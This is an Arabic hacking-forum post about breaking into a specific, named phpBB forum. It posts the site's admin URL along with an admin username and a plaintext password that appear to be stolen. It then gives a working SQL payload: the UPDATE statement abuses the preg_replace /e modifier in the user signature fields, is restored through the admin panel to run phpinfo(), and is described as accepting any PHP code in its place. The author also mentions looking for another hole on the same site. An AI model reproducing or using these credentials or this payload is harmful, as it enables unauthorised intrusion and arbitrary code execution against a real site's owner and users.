السيرفر راح يسببلي الجنوووووون :mad:
وسيلة لحد هنا:
http://www.cheela.org/cheelfor
http://www.cheela.org/cheelfor/admin
phpBB forum
username: vbondoux
he's admin...
pass: sZCnYyk8
جربت كتير, ماقدرت الاقي وسيلة لرفع الشيل. بس في طريقة غير...
تخلق فيل تسميه "Shell.sql" أو آية شي تاني... بس يكون sql.وتحت داخيلو
UPDATE phpbb_users SET user_sig_bbcode_uid='(.+)/e\0', user_sig='phpbb:phpinfo());' WHERE user_id=2;
وبعدها تعمل restore database من لوحة التحكم الادمن.
وفي تعديل ال profile نرى أن معلومات ال php ظهرت. يعني بالكود نبدل phpinfo() بـأي كود php تاني ويمشي. بس أنا مااعرف اش......... وللصراحة يئست منيل phpBB ورايح الدور على ثغرة تانية بـنفس الموقع.